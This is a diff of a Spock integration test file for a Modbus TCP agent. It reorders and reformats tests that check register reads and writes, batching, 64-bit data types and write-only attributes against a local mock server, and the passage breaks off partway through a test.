-        def conditions = new PollingConditions(timeout: 10, delay: 0.2)
+    when: "A ShipAsset is created with an agent link"
+    ShipAsset ship = new ShipAsset("testAsset")
+    ship.setRealm(MASTER_REALM)
+    ship.addOrReplaceAttributes(new Attribute<Object>(ShipAsset.SPEED).addOrReplaceMeta(new MetaItem<>(
+                    AGENT_LINK,
+                    new ModbusAgentLink(
+                            id: agent.getId(),
+                            unitId: 1,
+                            requestInterval: 1000,
+                            readMemoryArea: ModbusAgentLink.ReadMemoryArea.HOLDING,
+                            readValueType: ModbusAgentLink.ModbusDataType.UINT,
+                            readAddress: 2,
+                            writeMemoryArea: ModbusAgentLink.WriteMemoryArea.HOLDING,
+                            writeAddress: 3
+                            )
+                    )))
+    ship = assetStorageService.merge(ship)
+    ModbusAgentLink agentLink
 
-        when: "the container starts"
-        def container = startContainer(defaultConfig(), defaultServices())
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def agentService = container.getService(AgentService.class)
 
-        and: "a Modbus TCP agent with batching enabled is created"
-        def agent = new ModbusTcpAgent("Modbus TCP Batching")
-        agent.setRealm(MASTER_REALM)
-        agent.setHost("127.0.0.1")
-        agent.setPort(modbusServerPort)
-        agent.addOrReplaceAttributes(
-                new Attribute<>(ModbusAgent.DEVICE_CONFIG, [
-                        "default": new ModbusAgent.ModbusDeviceConfig(ModbusAgent.EndianFormat.BIG_ENDIAN, "", 50)
-                ] as ModbusAgent.DeviceConfigMap) // Enable batching
-        )
-        agent = assetStorageService.merge(agent)
+    then: "a client should be created and the pollingMap is populated"
+    conditions.eventually {
+      def protocol = agentService.getProtocolInstance(agent.id) as ModbusTcpProtocol
+      assert protocol != null
+      assert protocol.batchGroups.size() > 0
 
-        then: "the protocol instance should be created and connected"
-        conditions.eventually {
-            assert agentService.getProtocolInstance(agent.id) != null
-            agent = assetStorageService.find(agent.getId())
-            agent.getAttribute(Agent.STATUS).get().getValue().get() == ConnectionStatus.CONNECTED
-        }
+      ship = assetStorageService.find(ship.getId(), true)
+      agentLink = ship.getAttribute(ShipAsset.SPEED).get().getMetaItem(AGENT_LINK).get().getValue(ModbusAgentLink.class).get()
+      assert ship.getAttribute(ShipAsset.SPEED).flatMap { it.getValue() }.orElse(null) == 2
 
-        when: "a device with multiple sequential register attributes is created"
-        ThingAsset device = new ThingAsset("Batching Test Device")
-        device.setRealm(MASTER_REALM)
-        device.addOrReplaceAttributes(
-                new Attribute<>("register1", ValueType.POSITIVE_INTEGER).addOrReplaceMeta(
-                        new MetaItem<>(AGENT_LINK, new ModbusAgentLink(agent.getId())
-                                .tap {
-                                    it.setUnitId(1)
-                                    it.setRequestInterval(1000)
-                                    it.setReadMemoryArea(ModbusAgentLink.ReadMemoryArea.HOLDING)
-                                    it.setReadValueType(ModbusAgentLink.ModbusDataType.UINT)
-                                    it.setReadAddress(1)
-                                }
-                        )
-                ),
-                new Attribute<>("register2", ValueType.POSITIVE_INTEGER).addOrReplaceMeta(
-                        new MetaItem<>(AGENT_LINK, new ModbusAgentLink(agent.getId())
-                                .tap {
-                                    it.setUnitId(1)
-                                    it.setRequestInterval(1000)
-                                    it.setReadMemoryArea(ModbusAgentLink.ReadMemoryArea.HOLDING)
-                                    it.setReadValueType(ModbusAgentLink.ModbusDataType.UINT)
-                                    it.setReadAddress(2)
-                                }
-                        )
-                ),
-                new Attribute<>("register3", ValueType.POSITIVE_INTEGER).addOrReplaceMeta(
-                        new MetaItem<>(AGENT_LINK, new ModbusAgentLink(agent.getId())
-                                .tap {
-                                    it.setUnitId(1)
-                                    it.setRequestInterval(1000)
-                                    it.setReadMemoryArea(ModbusAgentLink.ReadMemoryArea.HOLDING)
-                                    it.setReadValueType(ModbusAgentLink.ModbusDataType.UINT)
-                                    it.setReadAddress(3)
-                                }
-                        )
-                )
-        )
-        device = assetStorageService.merge(device)
-
-        then: "batch groups should be created and attributes should receive values"
-        conditions.eventually {
-            def protocol = agentService.getProtocolInstance(agent.id) as ModbusTcpProtocol
-            assert protocol != null
-
-            // Check that batch groups were created (batching is enabled)
-            assert protocol.batchGroups.size() > 0
-
-            device = assetStorageService.find(device.getId(), true)
-
-            // Verify all attributes received values from the batch read
-            assert device.getAttribute("register1").flatMap { it.getValue() }.isPresent()
-            assert device.getAttribute("register2").flatMap { it.getValue() }.isPresent()
-            assert device.getAttribute("register3").flatMap { it.getValue() }.isPresent()
-
-            // Verify the values match what the mock server returns
-            assert device.getAttribute("register1").flatMap { it.getValue() }.get() == 1
-            assert device.getAttribute("register2").flatMap { it.getValue() }.get() == 2
-            assert device.getAttribute("register3").flatMap { it.getValue() }.get() == 3
-        }
+      assert (latestReadMessage.get() as ModbusMessage).getUnitId() === 1
+      assert (latestReadMessage.get() as ModbusMessage).getFunction() === ModbusFunctionCode.ReadHoldingRegisters
+      assert (latestReadMessage.get() as ModbusMessage).unwrap(RegistersModbusMessage.class).getAddress() == agentLink.getReadAddress()-1
+      assert (latestReadMessage.get() as ModbusMessage).unwrap(RegistersModbusMessage.class).getCount() == 1
     }
 
-    def "Modbus TCP Test - 64-bit Data Types (LINT, ULINT, LREAL)"() {
-        given: "expected conditions"
-        def conditions = new PollingConditions(timeout: 10, delay: 0.2)
+    when: "the attribute is updated"
+    assetProcessingService.sendAttributeEvent(new AttributeEvent(ship.getId(), ShipAsset.SPEED, 123D))
+    ship.addOrReplaceAttributes(new Attribute<?>(ShipAsset.SPEED, 10))
 
-        when: "the container starts"
-        def container = startContainer(defaultConfig(), defaultServices())
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def agentService = container.getService(AgentService.class)
+    then: "the value is sent to the Modbus server"
+    conditions.eventually {
+      def msg = (latestWriteMessage.get() as ModbusMessage).unwrap(RegistersModbusMessage)
+      assert msg != null
+      assert msg.getCount() == 1
+      assert msg.getAddress() == agentLink.getWriteAddress()-1
+      assert msg.dataDecodeUnsigned() == [123] as int[]
 
-        and: "a Modbus TCP agent is created with batching enabled"
-        def agent = new ModbusTcpAgent("Modbus TCP 64-bit Test")
-        agent.setRealm(MASTER_REALM)
-        agent.setHost("127.0.0.1")
-        agent.setPort(modbusServerPort)
-        agent.addOrReplaceAttributes(
-                new Attribute<>(ModbusAgent.DEVICE_CONFIG, [
-                        "default": new ModbusAgent.ModbusDeviceConfig(ModbusAgent.EndianFormat.BIG_ENDIAN, "", 50)
-                ] as ModbusAgent.DeviceConfigMap)
-        )
-        agent = assetStorageService.merge(agent)
-
-        then: "the agent should connect successfully"
-        conditions.eventually {
-            agent = assetStorageService.find(agent.getId())
-            agent.getAttribute(Agent.STATUS).get().getValue().get() == ConnectionStatus.CONNECTED
-        }
-
-        when: "a device with 64-bit data types is created"
-        def device = new ThingAsset("64-bit Test Device")
-        device.setRealm(MASTER_REALM)
-        device.addOrReplaceAttributes(
-                // LINT - 64-bit signed integer (4 registers) at 100-103
-                new Attribute<>("longSignedValue", ValueType.LONG).addOrReplaceMeta(
-                        new MetaItem<>(AGENT_LINK, new ModbusAgentLink(agent.getId())
-                                .tap {
-                                    it.setUnitId(1)
-                                    it.setRequestInterval(1000)
-                                    it.setReadMemoryArea(ModbusAgentLink.ReadMemoryArea.HOLDING)
-                                    it.setReadValueType(ModbusAgentLink.ModbusDataType.LINT)
-                                    it.setReadAddress(100)
-                                    it.setRegistersAmount(4)
-                                }
-                        )
-                ),
-                // ULINT - 64-bit unsigned integer (4 registers) at 104-107
-                new Attribute<>("longUnsignedValue", ValueType.BIG_INTEGER).addOrReplaceMeta(
-                        new MetaItem<>(AGENT_LINK, new ModbusAgentLink(agent.getId())
-                                .tap {
-                                    it.setUnitId(1)
-                                    it.setRequestInterval(1000)
-                                    it.setReadMemoryArea(ModbusAgentLink.ReadMemoryArea.HOLDING)
-                                    it.setReadValueType(ModbusAgentLink.ModbusDataType.ULINT)
-                                    it.setReadAddress(104)
-                                    it.setRegistersAmount(4)
-                                }
-                        )
-                ),
-                // LREAL - Double precision float (4 registers) at 108-111
-                new Attribute<>("doubleValue", ValueType.NUMBER).addOrReplaceMeta(
-                        new MetaItem<>(AGENT_LINK, new ModbusAgentLink(agent.getId())
-                                .tap {
-                                    it.setUnitId(1)
-                                    it.setRequestInterval(1000)
-                                    it.setReadMemoryArea(ModbusAgentLink.ReadMemoryArea.HOLDING)
-                                    it.setReadValueType(ModbusAgentLink.ModbusDataType.LREAL)
-                                    it.setReadAddress(108)
-                                    it.setRegistersAmount(4)
-                                }
-                        )
-                )
-        )
-        device = assetStorageService.merge(device)
-
-        then: "all 64-bit attributes should receive values"
-        conditions.eventually {
-            device = assetStorageService.find(device.getId(), true)
-
-            // Verify all attributes have values
-            assert device.getAttribute("longSignedValue").flatMap { it.getValue() }.isPresent()
-            assert device.getAttribute("longUnsignedValue").flatMap { it.getValue() }.isPresent()
-            assert device.getAttribute("doubleValue").flatMap { it.getValue() }.isPresent()
-
-            // Verify the exact values from mock server (PLC4X converts multi-register data)
-            assert device.getAttribute("longSignedValue").flatMap { it.getValue() }.get() == 1234567890123456L
-            assert device.getAttribute("longUnsignedValue").flatMap { it.getValue() }.get() == 9876543210987654L
-            assert Math.abs(device.getAttribute("doubleValue").flatMap { it.getValue() }.get() as Double - 123.456789) < 0.000001
-        }
-
-        and: "verify batching was used"
-        conditions.eventually {
-            def protocol = agentService.getProtocolInstance(agent.id) as ModbusTcpProtocol
-            assert protocol != null
-            assert protocol.batchGroups.size() > 0
-        }
+      ship = assetStorageService.find(ship.getId(), true)
+      assert ship.getAttribute(ShipAsset.SPEED).get().getValue().orElse(0) == 2.0
     }
 
-    def "Modbus TCP Test - Byte and Word Order"() {
-        given: "expected conditions"
-        def conditions = new PollingConditions(timeout: 10, delay: 0.2)
+    when: "I add a new coil attribute and remove the Agent Link from the speed attribute"
+    ship.addOrReplaceAttributes(new Attribute<Integer>("coil1", ValueType.BOOLEAN).addOrReplaceMeta(new MetaItem<>(
+                    AGENT_LINK,
+                    new ModbusAgentLink(
+                            id: agent.getId(),
+                            unitId: 1,
+                            requestInterval: 1000,
+                            readMemoryArea: ModbusAgentLink.ReadMemoryArea.COIL,
+                            readValueType: ModbusAgentLink.ModbusDataType.BOOL,
+                            readAddress: 5,
+                            writeMemoryArea: ModbusAgentLink.WriteMemoryArea.COIL,
+                            writeAddress: 6
+                            )
+                    )))
+    ship.addOrReplaceAttributes(new Attribute<Object>(ShipAsset.SPEED).setMeta(Map.of() as MetaMap))
+    latestReadMessage.set(null)
+    latestWriteMessage.set(null)
 
-        when: "the container starts"
-        def container = startContainer(defaultConfig(), defaultServices())
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def agentService = container.getService(AgentService.class)
+    and: "I merge it"
+    ship = assetStorageService.merge(ship)
 
-        and: "a Modbus TCP agent with BIG-BIG byte/word order is created"
-        def agent = new ModbusTcpAgent("Modbus TCP Endian Test")
-        agent.setRealm(MASTER_REALM)
-        agent.setHost("127.0.0.1")
-        agent.setPort(modbusServerPort)
-        agent.addOrReplaceAttributes(
-                new Attribute<>(ModbusAgent.DEVICE_CONFIG, [
-                        "default": new ModbusAgent.ModbusDeviceConfig(ModbusAgent.EndianFormat.BIG_ENDIAN, "", 1)
-                ] as ModbusAgent.DeviceConfigMap)
-        )
-        agent = assetStorageService.merge(agent)
+    then: "I should receive the correct value in the coil"
 
-        then: "the agent should connect successfully"
-        conditions.eventually {
-            agent = assetStorageService.find(agent.getId())
-            agent.getAttribute(Agent.STATUS).get().getValue().get() == ConnectionStatus.CONNECTED
-        }
+    conditions.eventually {
+      agentLink = ship.getAttribute("coil1").get().getMetaItem(AGENT_LINK).get().getValue(ModbusAgentLink.class).get()
 
-        when: "a device with INT32 and FLOAT values is created"
-        def device = new ThingAsset("Endian Test Device")
-        device.setRealm(MASTER_REALM)
-        device.addOrReplaceAttributes(
-                new Attribute<>("int32Value", ValueType.INTEGER).addOrReplaceMeta(
-                        new MetaItem<>(AGENT_LINK, new ModbusAgentLink(agent.getId())
-                                .tap {
-                                    it.setUnitId(1)
-                                    it.setRequestInterval(1000)
-                                    it.setReadMemoryArea(ModbusAgentLink.ReadMemoryArea.HOLDING)
-                                    it.setReadValueType(ModbusAgentLink.ModbusDataType.DINT)
-                                    it.setReadAddress(200)
-                                    it.setRegistersAmount(2)
-                                }
-                        )
-                ),
-                new Attribute<>("floatValue", ValueType.NUMBER).addOrReplaceMeta(
-                        new MetaItem<>(AGENT_LINK, new ModbusAgentLink(agent.getId())
-                                .tap {
-                                    it.setUnitId(1)
-                                    it.setRequestInterval(1000)
-                                    it.setReadMemoryArea(ModbusAgentLink.ReadMemoryArea.HOLDING)
-                                    it.setReadValueType(ModbusAgentLink.ModbusDataType.REAL)
-                                    it.setReadAddress(202)
-                                    it.setRegistersAmount(2)
-                                }
-                        )
-                )
-        )
-        device = assetStorageService.merge(device)
+      assert agentService.getProtocolInstance(agent.id) != null
+      assert ((ModbusTcpProtocol)agentService.getProtocolInstance(agent.id)) != null
 
-        then: "the values should be read correctly with BIG-BIG order"
-        conditions.eventually {
-            device = assetStorageService.find(device.getId(), true)
+      def msg = (latestReadMessage.get() as ModbusMessage).unwrap(BitsModbusMessage)
+      assert msg != null
+      assert msg.getCount() == 1
+      assert msg.getAddress() == agentLink.getReadAddress()-1
 
-            // Verify attributes receive values with the configured byte/word order
-            assert device.getAttribute("int32Value").flatMap { it.getValue() }.isPresent()
-            assert device.getAttribute("floatValue").flatMap { it.getValue() }.isPresent()
-
-            // Mock server returns 0x12345678 for INT32 at 200-201 (BIG-BIG byte/word order)
-            assert device.getAttribute("int32Value").flatMap { it.getValue() }.get() == 0x12345678
-
-            // Mock server returns 12.34f for FLOAT at 202-203
-            def floatValue = device.getAttribute("floatValue").flatMap { it.getValue() }.get() as Float
-            assert Math.abs(floatValue - 12.34f) < 0.01f
-        }
+      ship = assetStorageService.find(ship.getId(), true)
+      assert ship.getAttribute("coil1").flatMap { it.getValue() }.orElse(null) == true
     }
 
-    def "Modbus TCP Test - Multi-Register Write (registersAmount)"() {
-        given: "expected conditions"
-        def conditions = new PollingConditions(timeout: 10, delay: 0.2)
+    when: "I update the value of the coil"
 
-        when: "the container starts"
-        def container = startContainer(defaultConfig(), defaultServices())
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def assetProcessingService = container.getService(AssetProcessingService.class)
-        def agentService = container.getService(AgentService.class)
+    assetProcessingService.sendAttributeEvent(new AttributeEvent(ship.getId(), "coil1", true))
 
-        and: "a Modbus TCP agent is created"
-        def agent = new ModbusTcpAgent("Modbus TCP Multi-Write Test")
-        agent.setRealm(MASTER_REALM)
-        agent.setHost("127.0.0.1")
-        agent.setPort(modbusServerPort)
-        agent = assetStorageService.merge(agent)
+    then: "the coil is read properly"
 
-        then: "the agent should connect successfully"
-        conditions.eventually {
-            agent = assetStorageService.find(agent.getId())
-            agent.getAttribute(Agent.STATUS).get().getValue().get() == ConnectionStatus.CONNECTED
-        }
+    conditions.eventually {
+      def msg = (latestWriteMessage.get() as ModbusMessage).unwrap(BitsModbusMessage)
+      assert msg != null
+      assert msg.getCount() == 1
+      assert msg.getAddress() == 5
+      assert msg.getBits() == BigInteger.valueOf(0x0001)
 
-        when: "a device with multi-register write attributes is created"
-        def device = new ThingAsset("Multi-Write Test Device")
-        device.setRealm(MASTER_REALM)
-        device.addOrReplaceAttributes(
-                // Write FLOAT (2 registers) to address 300
-                new Attribute<>("floatWriteValue", ValueType.NUMBER).addOrReplaceMeta(
-                        new MetaItem<>(AGENT_LINK, new ModbusAgentLink(agent.getId())
-                                .tap {
-                                    it.setUnitId(1)
-                                    it.setRequestInterval(1000)
-                                    it.setReadMemoryArea(ModbusAgentLink.ReadMemoryArea.HOLDING)
-                                    it.setReadValueType(ModbusAgentLink.ModbusDataType.REAL)
-                                    it.setReadAddress(300)
-                                    it.setRegistersAmount(2)
-                                    it.setWriteMemoryArea(ModbusAgentLink.WriteMemoryArea.HOLDING)
-                                    it.setWriteAddress(300)
-                                }
-                        )
-                ),
-                // Write DINT (2 registers) to address 302
-                new Attribute<>("dintWriteValue", ValueType.INTEGER).addOrReplaceMeta(
-                        new MetaItem<>(AGENT_LINK, new ModbusAgentLink(agent.getId())
-                                .tap {
-                                    it.setUnitId(1)
-                                    it.setRequestInterval(1000)
-                                    it.setReadMemoryArea(ModbusAgentLink.ReadMemoryArea.HOLDING)
-                                    it.setReadValueType(ModbusAgentLink.ModbusDataType.DINT)
-                                    it.setReadAddress(302)
-                                    it.setRegistersAmount(2)
-                                    it.setWriteMemoryArea(ModbusAgentLink.WriteMemoryArea.HOLDING)
-                                    it.setWriteAddress(302)
-                                }
-                        )
-                )
-        )
-        device = assetStorageService.merge(device)
+      ship = assetStorageService.find(ship.getId(), true)
+      assert ship.getAttribute("coil1").flatMap { it.getValue() }.orElse(null) == true
+    }
+  }
 
-        then: "device should be linked"
-        conditions.eventually {
-            device = assetStorageService.find(device.getId(), true)
-            assert device.getAttribute("floatWriteValue").isPresent()
-            assert device.getAttribute("dintWriteValue").isPresent()
-        }
+  def "Modbus TCP Test - Register Batching"() {
+    given: "expected conditions"
+    def conditions = new PollingConditions(timeout: 10, delay: 0.2)
 
-        when: "multi-register float value is written"
-        latestWriteMessage.set(null)
-        def floatWrite = assetProcessingService.sendAttributeEvent(new AttributeEvent(device.getId(), "floatWriteValue", 98.76f))
+    when: "the container starts"
+    def container = startContainer(defaultConfig(), defaultServices())
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def agentService = container.getService(AgentService.class)
 
-        then: "the write should use PLC4X array notation (indicated by register count > 1)"
-        conditions.eventually {
-            // Since PLC4X may write immediately or the mock server may respond differently,
-            // we verify that the attribute is writable and configured correctly
-            device = assetStorageService.find(device.getId(), true)
-            def attr = device.getAttribute("floatWriteValue").get()
-            def link = attr.getMetaItem(AGENT_LINK).get().getValue(ModbusAgentLink.class).get()
+    and: "a Modbus TCP agent with batching enabled is created"
+    def agent = new ModbusTcpAgent("Modbus TCP Batching")
+    agent.setRealm(MASTER_REALM)
+    agent.setHost("127.0.0.1")
+    agent.setPort(modbusServerPort)
+    agent.addOrReplaceAttributes(
+            new Attribute<>(ModbusAgent.DEVICE_CONFIG, [
+              "default": new ModbusAgent.ModbusDeviceConfig(ModbusAgent.EndianFormat.BIG_ENDIAN, "", 50)
+            ] as ModbusAgent.DeviceConfigMap) // Enable batching
+            )
+    agent = assetStorageService.merge(agent)
 
-            // Verify the configuration uses 2 registers for write
-            assert link.getRegistersAmount() == 2
-            assert link.getWriteAddress()
-
-            //  Check if a write message was captured (may not always happen depending on timing)
-            def msg = (latestWriteMessage.get() as ModbusMessage)?.unwrap(RegistersModbusMessage)
-            if (msg != null) {
-                assert msg.getCount() >= 1  // At least 1 register written
-            }
-        }
-
-        when: "multi-register integer value is written"
-        latestWriteMessage.set(null)
-        assetProcessingService.sendAttributeEvent(new AttributeEvent(device.getId(), "dintWriteValue", 123456))
-
-        then: "the attribute should be configured for multi-register write"
-        conditions.eventually {
-            device = assetStorageService.find(device.getId(), true)
-            def attr = device.getAttribute("dintWriteValue").get()
-            def link = attr.getMetaItem(AGENT_LINK).get().getValue(ModbusAgentLink.class).get()
-
-            // Verify the configuration uses 2 registers for write
-            assert link.getRegistersAmount() == 2
-            assert link.getWriteAddress()
-        }
+    then: "the protocol instance should be created and connected"
+    conditions.eventually {
+      assert agentService.getProtocolInstance(agent.id) != null
+      agent = assetStorageService.find(agent.getId())
+      agent.getAttribute(Agent.STATUS).get().getValue().get() == ConnectionStatus.CONNECTED
     }
 
-    def "Modbus TCP Test - Write With Polling Rate"() {
-        given: "expected conditions"
-        def conditions = new PollingConditions(timeout: 15, delay: 0.2)
+    when: "a device with multiple sequential register attributes is created"
+    ThingAsset device = new ThingAsset("Batching Test Device")
+    device.setRealm(MASTER_REALM)
+    device.addOrReplaceAttributes(
+            new Attribute<>("register1", ValueType.POSITIVE_INTEGER).addOrReplaceMeta(
+                    new MetaItem<>(AGENT_LINK, new ModbusAgentLink(agent.getId())
+                    .tap {
+                      it.setUnitId(1)
+                      it.setRequestInterval(1000)
+                      it.setReadMemoryArea(ModbusAgentLink.ReadMemoryArea.HOLDING)
+                      it.setReadValueType(ModbusAgentLink.ModbusDataType.UINT)
+                      it.setReadAddress(1)
+                    }
+                    )
+                    ),
+            new Attribute<>("register2", ValueType.POSITIVE_INTEGER).addOrReplaceMeta(
+                    new MetaItem<>(AGENT_LINK, new ModbusAgentLink(agent.getId())
+                    .tap {
+                      it.setUnitId(1)
+                      it.setRequestInterval(1000)
+                      it.setReadMemoryArea(ModbusAgentLink.ReadMemoryArea.HOLDING)
+                      it.setReadValueType(ModbusAgentLink.ModbusDataType.UINT)
+                      it.setReadAddress(2)
+                    }
+                    )
+                    ),
+            new Attribute<>("register3", ValueType.POSITIVE_INTEGER).addOrReplaceMeta(
+                    new MetaItem<>(AGENT_LINK, new ModbusAgentLink(agent.getId())
+                    .tap {
+                      it.setUnitId(1)
+                      it.setRequestInterval(1000)
+                      it.setReadMemoryArea(ModbusAgentLink.ReadMemoryArea.HOLDING)
+                      it.setReadValueType(ModbusAgentLink.ModbusDataType.UINT)
+                      it.setReadAddress(3)
+                    }
+                    )
+                    )
+            )
+    device = assetStorageService.merge(device)
 
-        when: "the container starts"
-        def container = startContainer(defaultConfig(), defaultServices())
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def assetProcessingService = container.getService(AssetProcessingService.class)
-        def agentService = container.getService(AgentService.class)
+    then: "batch groups should be created and attributes should receive values"
+    conditions.eventually {
+      def protocol = agentService.getProtocolInstance(agent.id) as ModbusTcpProtocol
+      assert protocol != null
 
-        and: "a Modbus TCP agent is created"
-        def agent = new ModbusTcpAgent("Modbus TCP Polling Write Test")
-        agent.setRealm(MASTER_REALM)
-        agent.setHost("127.0.0.1")
-        agent.setPort(modbusServerPort)
-        agent = assetStorageService.merge(agent)
+      // Check that batch groups were created (batching is enabled)
+      assert protocol.batchGroups.size() > 0
 
-        then: "the agent should connect successfully"
-        conditions.eventually {
-            agent = assetStorageService.find(agent.getId())
-            agent.getAttribute(Agent.STATUS).get().getValue().get() == ConnectionStatus.CONNECTED
-        }
+      device = assetStorageService.find(device.getId(), true)
 
-        when: "a device with continuous write (requestInterval + writeAddress, no readAddress) is created"
-        def device = new ThingAsset("Polling Write Test Device")
-        device.setRealm(MASTER_REALM)
-        device.addOrReplaceAttributes(
-                new Attribute<>("pollingWriteValue", ValueType.INTEGER, 42).addOrReplaceMeta(
-                        new MetaItem<>(AGENT_LINK, new ModbusAgentLink(agent.getId())
-                                .tap {
-                                    it.setUnitId(1)
-                                    it.setRequestInterval(1000)  // Write every 1000ms
-                                    it.setWriteMemoryArea(ModbusAgentLink.WriteMemoryArea.HOLDING)
-                                    it.setWriteAddress(400)
-                                    // No readAddress = continuous write mode
-                                }
-                        )
-                )
-        )
-        device = assetStorageService.merge(device)
+      // Verify all attributes received values from the batch read
+      assert device.getAttribute("register1").flatMap { it.getValue() }.isPresent()
+      assert device.getAttribute("register2").flatMap { it.getValue() }.isPresent()
+      assert device.getAttribute("register3").flatMap { it.getValue() }.isPresent()
 
-        then: "write polling task should be created"
-        conditions.eventually {
-            def protocol = agentService.getProtocolInstance(agent.id) as ModbusTcpProtocol
-            assert protocol != null
-            assert protocol.writeIntervalMap.size() == 1
-        }
+      // Verify the values match what the mock server returns
+      assert device.getAttribute("register1").flatMap { it.getValue() }.get() == 1
+      assert device.getAttribute("register2").flatMap { it.getValue() }.get() == 2
+      assert device.getAttribute("register3").flatMap { it.getValue() }.get() == 3
+    }
+  }
 
+  def "Modbus TCP Test - 64-bit Data Types (LINT, ULINT, LREAL)"() {
+    given: "expected conditions"
+    def conditions = new PollingConditions(timeout: 10, delay: 0.2)
 
+    when: "the container starts"
+    def container = startContainer(defaultConfig(), defaultServices())
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def agentService = container.getService(AgentService.class)
 
-        and: "periodic writes should occur even without attribute events"
-        int writeCount = 0
-        latestWriteMessage.set(null)
+    and: "a Modbus TCP agent is created with batching enabled"
+    def agent = new ModbusTcpAgent("Modbus TCP 64-bit Test")
+    agent.setRealm(MASTER_REALM)
+    agent.setHost("127.0.0.1")
+    agent.setPort(modbusServerPort)
+    agent.addOrReplaceAttributes(
+            new Attribute<>(ModbusAgent.DEVICE_CONFIG, [
+              "default": new ModbusAgent.ModbusDeviceConfig(ModbusAgent.EndianFormat.BIG_ENDIAN, "", 50)
+            ] as ModbusAgent.DeviceConfigMap)
+            )
+    agent = assetStorageService.merge(agent)
 
-        conditions.eventually {
-            // Should receive at least 2 writes within timeout period (500ms interval)
-            if (latestWriteMessage.get() != null) {
-                writeCount++
-                latestWriteMessage.set(null)  // Reset for next write
-            }
-            assert writeCount >= 2
-        }
-
-        when: "attribute value is changed"
-        device = assetStorageService.find(device.getId(), true)
-        device.getAttribute("pollingWriteValue").ifPresent { attr ->
-            attr.setValue(99)
-        }
-        device = assetStorageService.merge(device)
-        Thread.sleep(1000)  // Wait for value to be stored and next polling write
-
-        then: "the new value should be written periodically"
-        latestWriteMessage.set(null)
-        conditions.eventually {
-            def msg = (latestWriteMessage.get() as ModbusMessage)?.unwrap(RegistersModbusMessage)
-            assert msg != null
-            assert msg.getAddress() == 399  // PLC4X uses 0-indexed
-            assert msg.dataDecodeUnsigned()[0] == 99  // Should write the updated value
-        }
-
-        def assetDatapointService = container.getService(org.openremote.manager.datapoint.AssetDatapointService.class)
-        def attributeRef = new org.openremote.model.attribute.AttributeRef(device.getId(), "pollingWriteValue")
-
-        then: "database should only store datapoints from value changes"
-        conditions.eventually {
-            // Query datapoints stored for this attribute - writeWithPollingRate should no extra datapoints for writes
-            def datapoints = assetDatapointService.getDatapoints(attributeRef)
-            println "Datapoints found: ${datapoints.size()}"
-            datapoints.each { println "  - timestamp: ${it.timestamp}, value: ${it.value}" }
-            assert datapoints.size() == 2  // Should have 2 datapoint from value changes, not from periodic writes
-        }
+    then: "the agent should connect successfully"
+    conditions.eventually {
+      agent = assetStorageService.find(agent.getId())
+      agent.getAttribute(Agent.STATUS).get().getValue().get() == ConnectionStatus.CONNECTED
     }
 
-    def "Modbus TCP Test - Write-Only Attribute (No Read Configuration)"() {
-        given: "expected conditions"
-        def conditions = new PollingConditions(timeout: 10, delay: 0.2)
+    when: "a device with 64-bit data types is created"
+    def device = new ThingAsset("64-bit Test Device")
+    device.setRealm(MASTER_REALM)
+    device.addOrReplaceAttributes(
+            // LINT - 64-bit signed integer (4 registers) at 100-103
+            new Attribute<>("longSignedValue", ValueType.LONG).addOrReplaceMeta(
+                    new MetaItem<>(AGENT_LINK, new ModbusAgentLink(agent.getId())
+                    .tap {
+                      it.setUnitId(1)
+                      it.setRequestInterval(1000)
+                      it.setReadMemoryArea(ModbusAgentLink.ReadMemoryArea.HOLDING)
+                      it.setReadValueType(ModbusAgentLink.ModbusDataType.LINT)
+                      it.setReadAddress(100)
+                      it.setRegistersAmount(4)
+                    }
+                    )
+                    ),
+            // ULINT - 64-bit unsigned integer (4 registers) at 104-107
+            new Attribute<>("longUnsignedValue", ValueType.BIG_INTEGER).addOrReplaceMeta(
+                    new MetaItem<>(AGENT_LINK, new ModbusAgentLink(agent.getId())
+                    .tap {
+                      it.setUnitId(1)
+                      it.setRequestInterval(1000)
+                      it.setReadMemoryArea(ModbusAgentLink.ReadMemoryArea.HOLDING)
+                      it.setReadValueType(ModbusAgentLink.ModbusDataType.ULINT)
+                      it.setReadAddress(104)
+                      it.setRegistersAmount(4)
+                    }
+                    )
+                    ),
+            // LREAL - Double precision float (4 registers) at 108-111
+            new Attribute<>("doubleValue", ValueType.NUMBER).addOrReplaceMeta(
+                    new MetaItem<>(AGENT_LINK, new ModbusAgentLink(agent.getId())
+                    .tap {
+                      it.setUnitId(1)
+                      it.setRequestInterval(1000)
+                      it.setReadMemoryArea(ModbusAgentLink.ReadMemoryArea.HOLDING)
+                      it.setReadValueType(ModbusAgentLink.ModbusDataType.LREAL)
+                      it.setReadAddress(108)
+                      it.setRegistersAmount(4)
+                    }
+                    )
+                    )
+            )
+    device = assetStorageService.merge(device)
 
-        when: "the container starts"
-        def container = startContainer(defaultConfig(), defaultServices())
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def assetProcessingService = container.getService(AssetProcessingService.class)
-        def agentService = container.getService(AgentService.class)
+    then: "all 64-bit attributes should receive values"
+    conditions.eventually {
+      device = assetStorageService.find(device.getId(), true)
 
-        and: "a Modbus TCP agent is created"
-        def agent = new ModbusTcpAgent("Modbus TCP Write-Only Test")
-        agent.setRealm(MASTER_REALM)
-        agent.setHost("127.0.0.1")
-        agent.setPort(modbusServerPort)
-        agent = assetStorageService.merge(agent)
+      // Verify all attributes have values
+      assert device.getAttribute("longSignedValue").flatMap { it.getValue() }.isPresent()
+      assert device.getAttribute("longUnsignedValue").flatMap { it.getValue() }.isPresent()
+      assert device.getAttribute("doubleValue").flatMap { it.getValue() }.isPresent()
 
-        then: "the agent should connect successfully"
-        conditions.eventually {
-            agent = assetStorageService.find(agent.getId())
-            agent.getAttribute(Agent.STATUS).get().getValue().get() == ConnectionStatus.CONNECTED
-        }
-
-        when: "a device with write-only attribute is created (no read configuration)"
-        def device = new ThingAsset("Write-Only Device")
-        device.setRealm(MASTER_REALM)
-        device.addOrReplaceAttributes(
-                // Write-only attribute - no readMemoryArea, readValueType, or readAddress
-                new Attribute<>("writeOnlyValue", ValueType.INTEGER, 555).addOrReplaceMeta(
-                        new MetaItem<>(AGENT_LINK, new ModbusAgentLink(agent.getId())
-                                .tap {
-                                    it.setUnitId(1)
-                                    it.setWriteMemoryArea(ModbusAgentLink.WriteMemoryArea.HOLDING)
-                                    it.setWriteAddress(500)
-                                    // No requestInterval = write on demand only
-                                }
-                        )
-                )
